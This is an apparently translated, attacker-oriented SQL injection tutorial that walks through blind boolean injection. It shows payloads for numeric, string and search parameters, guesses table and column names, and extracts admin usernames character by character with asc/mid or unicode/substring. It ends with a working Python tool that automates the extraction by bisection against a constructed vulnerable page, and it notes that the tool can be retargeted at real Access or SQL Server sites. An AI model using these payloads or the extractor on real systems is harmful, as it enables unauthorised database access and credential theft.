SQL Injection Attack Trilogy

Source: Internet
Author: User
Tags: sql injection attack

The introductory article explained how to recognise a SQL injection point. Recognising one, however, is far from enough to get at a site's confidential data, so this article carries on from there and looks at how to pull the content you want out of the database.

First, the general steps of a SQL injection attack:

Section 1: General steps of SQL Injection

First, judge the environment, find the injection point, and determine the database type. This was already covered in the Getting Started article.

Second, reconstruct in your head what the original SQL statement looks like, according to the type of the injected parameter. There are three kinds:

(A) id=49. The injected parameter is numeric; the SQL statement is roughly:

Select * from tablename where field = 49

Inject id=49 and [query condition] and the generated statement becomes:

Select * from tablename where field = 49 and [query condition]

(B) class=series. The injected parameter is a string; the SQL statement is roughly:

Select * from tablename where field = 'series'

Inject class=series' and [query condition] and ''=' and the generated statement becomes:

Select * from tablename where field = 'series' and [query condition] and ''=''

(C) A search parameter that is not filtered, such as keyword=keyword. The SQL statement is roughly:

Select * from tablename where field like '%keyword%'

Inject keyword=' and [query condition] and '%25'=' (%25 is the URL encoding of %) and the generated statement becomes:

Select * from tablename where field like '%' and [query condition] and '%'='%'

Then replace [query condition] with a SQL expression that guesses a table name, for example:

id=49 and (select count(*) from Admin)>=0

If the page comes back identical to the page for id=49, the added condition is true, which means the table admin exists; if the page differs, it does not (keep this method in mind, it is used throughout). Repeat with other names until a table name is guessed correctly.

Once the table name is known, replace count(*) with count(field name) and guess the field names by the same principle.

Some may object that there is a lot of luck involved: if the table names are complicated and irregular, guessing will never finish. That is true. No hacking technique succeeds 100% of the time, however skilled the attacker; attacks work because someone else's program was written carelessly or because users lack security awareness.

Don't be discouraged, though. With SQL Server there is also a way to make the program itself tell us the table and field names; it will be introduced in the advanced article.

Finally, once the table name and column name are known, use a SQL statement to retrieve the field value. The most common method is ASCII character-by-character decoding: slow, but always workable.

Suppose we know the admin table has a username field. Take the first record and test its length:

http://www.mytest.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

The principle: if the length of the first record's username is greater than 0, the condition is true and the page is normal. Then test >1, >2, >3 and so on until the condition becomes false. For example, if >7 is true and >8 is false, then len(username)=8.

Of course, nobody is going to step through 0, 1, 2, 3 one at a time; think about how to start more cleverly. Once the length is known, use mid(username,N,1) to cut out the Nth character and asc(mid(username,N,1)) to get its ASCII code, for example:

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

The ASCII code of the first character is likewise obtained by narrowing down the range step by step. Note that the ASCII codes of letters and digits lie between 1 and 128, so the search can be accelerated by bisection (halving the candidate interval on each probe); if you write a small program to do the testing, efficiency improves greatly.

Section 2: Common SQL injection functions

Someone with a basic command of SQL has a far higher success rate than someone who only knows injection by rote, so it pays to raise your SQL level, in particular with the following common functions and commands.

Access: asc(character)   SQL Server: unicode(character)

Purpose: returns the character code of a character (ASCII in Access, Unicode in SQL Server).

Access: chr(number)   SQL Server: nchar(number)

Purpose: the opposite of asc; returns the character for a given code.

Access: mid(string, N, L)   SQL Server: substring(string, N, L)

Purpose: returns the substring of L characters starting at position N (positions N to N+L-1).

Access: abs(number)   SQL Server: abs(number)

Purpose: returns the absolute value of a number (used when guessing Chinese characters).

Access: A between B and C   SQL Server: A between B and C

Purpose: tests whether A lies between B and C (inclusive).

Section 3: Handling Chinese characters

Chinese characters come up often during injection, and some people want to give up as soon as they see one. In fact, with a little knowledge of Chinese character encoding, this "Chinese phobia" is quickly overcome.

First, two pieces of common sense:

In Access, asc() on a Chinese character may return a negative number. After you obtain the negative value, take its absolute value with abs(); the character itself is unchanged.

In SQL Server, the code of a Chinese character is a positive number, but because the character is a double-byte Unicode value, ascii() cannot return it. Use unicode() to get the Unicode code point and nchar() to turn a code point back into the character.

With those two points in mind, guessing Chinese characters is really no different from guessing English ones: apart from the functions used, the only thing to watch is that the range to search is larger; the method is the same.
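The whole procedure of Section 1 (confirm the table, confirm the column, bisect the length, then bisect each character code) and the wider search range that Section 3 calls for are put together below in one small Python harness. This is an added example, not code from the original article. The target site is a constructed in-memory SQLite stand-in for showdetail.asp with a deliberately concatenated id parameter and constructed admin rows; SQLite's unicode(), substr(), length() and LIMIT 1 stand in for the Access/SQL Server asc()/unicode(), mid()/substring(), len() and top 1 used in the text, so the payload spelling differs slightly while the boolean logic is the same. The BlindInjector class, its probe counter and the 0xFFFF upper bound for CJK characters are the example's own choices.

```python
import sqlite3


def make_vulnerable_site():
    """Constructed stand-in for showdetail.asp: returns a function that
    renders (True) or fails to render (False) the product page for a raw
    id parameter.  Data is made up for the example."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE product (id INTEGER, name TEXT);
        INSERT INTO product VALUES (49, 'widget');
        CREATE TABLE admin (username TEXT, realname TEXT, password TEXT);
        INSERT INTO admin VALUES ('adminuser', '张三', 's3cret');
    """)

    def showdetail(id_param):
        # Numeric parameter pasted straight into the query: the id=49
        # pattern from Section 1.  Deliberately vulnerable.
        sql = "SELECT * FROM product WHERE id = " + id_param
        try:
            return len(con.execute(sql).fetchall()) > 0
        except sqlite3.Error:
            return False  # error page: differs from the normal id=49 page
    return showdetail


class BlindInjector:
    """Boolean-based blind extraction driven by a same-page/different-page oracle."""

    def __init__(self, showdetail):
        self.showdetail = showdetail
        self.probes = 0  # number of requests sent, to show the bisection saving

    def ask(self, condition):
        """True iff 'id=49 and (condition)' renders the same page as id=49."""
        self.probes += 1
        return self.showdetail(f"49 and ({condition})")

    def table_exists(self, table):
        # Page unchanged => the subquery ran without error => the table exists.
        return self.ask(f"(select count(*) from {table}) >= 0")

    def column_exists(self, table, column):
        return self.ask(f"(select count({column}) from {table}) >= 0")

    def find_int(self, expr, lo, hi):
        """Bisect for the integer value of expr, known to lie in [lo, hi],
        using only 'expr > mid' probes (the half-interval method of Section 1)."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_field(self, table, column, max_code=128):
        """Read the first row's value one character at a time.
        max_code=128 covers letters and digits; pass 0xFFFF for the larger
        Unicode range that Chinese characters need (Section 3)."""
        first = f"(select {{}} from {table} limit 1)"  # SQLite's 'top 1'
        length = self.find_int(first.format(f"length({column})"), 0, 255)
        chars = []
        for n in range(1, length + 1):
            code_expr = first.format(f"unicode(substr({column}, {n}, 1))")
            chars.append(chr(self.find_int(code_expr, 0, max_code)))
        return "".join(chars)


if __name__ == "__main__":
    inj = BlindInjector(make_vulnerable_site())
    print("admin table exists:", inj.table_exists("admin"))
    print("username column exists:", inj.column_exists("admin", "username"))
    print("username:", inj.extract_field("admin", "username"))
    print("realname:", inj.extract_field("admin", "realname", max_code=0xFFFF))
    print("probes used:", inj.probes)
```

Each bisection over a range of 129 codes costs at most 8 probes per character and a range of 65536 codes costs 16, against more than a hundred or tens of thousands for linear stepping; the probe counter makes that visible when the script is run. Against a real Access or SQL Server target, only the payload text in ask(), find_int() and extract_field() needs swapping for the functions listed in Section 2.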
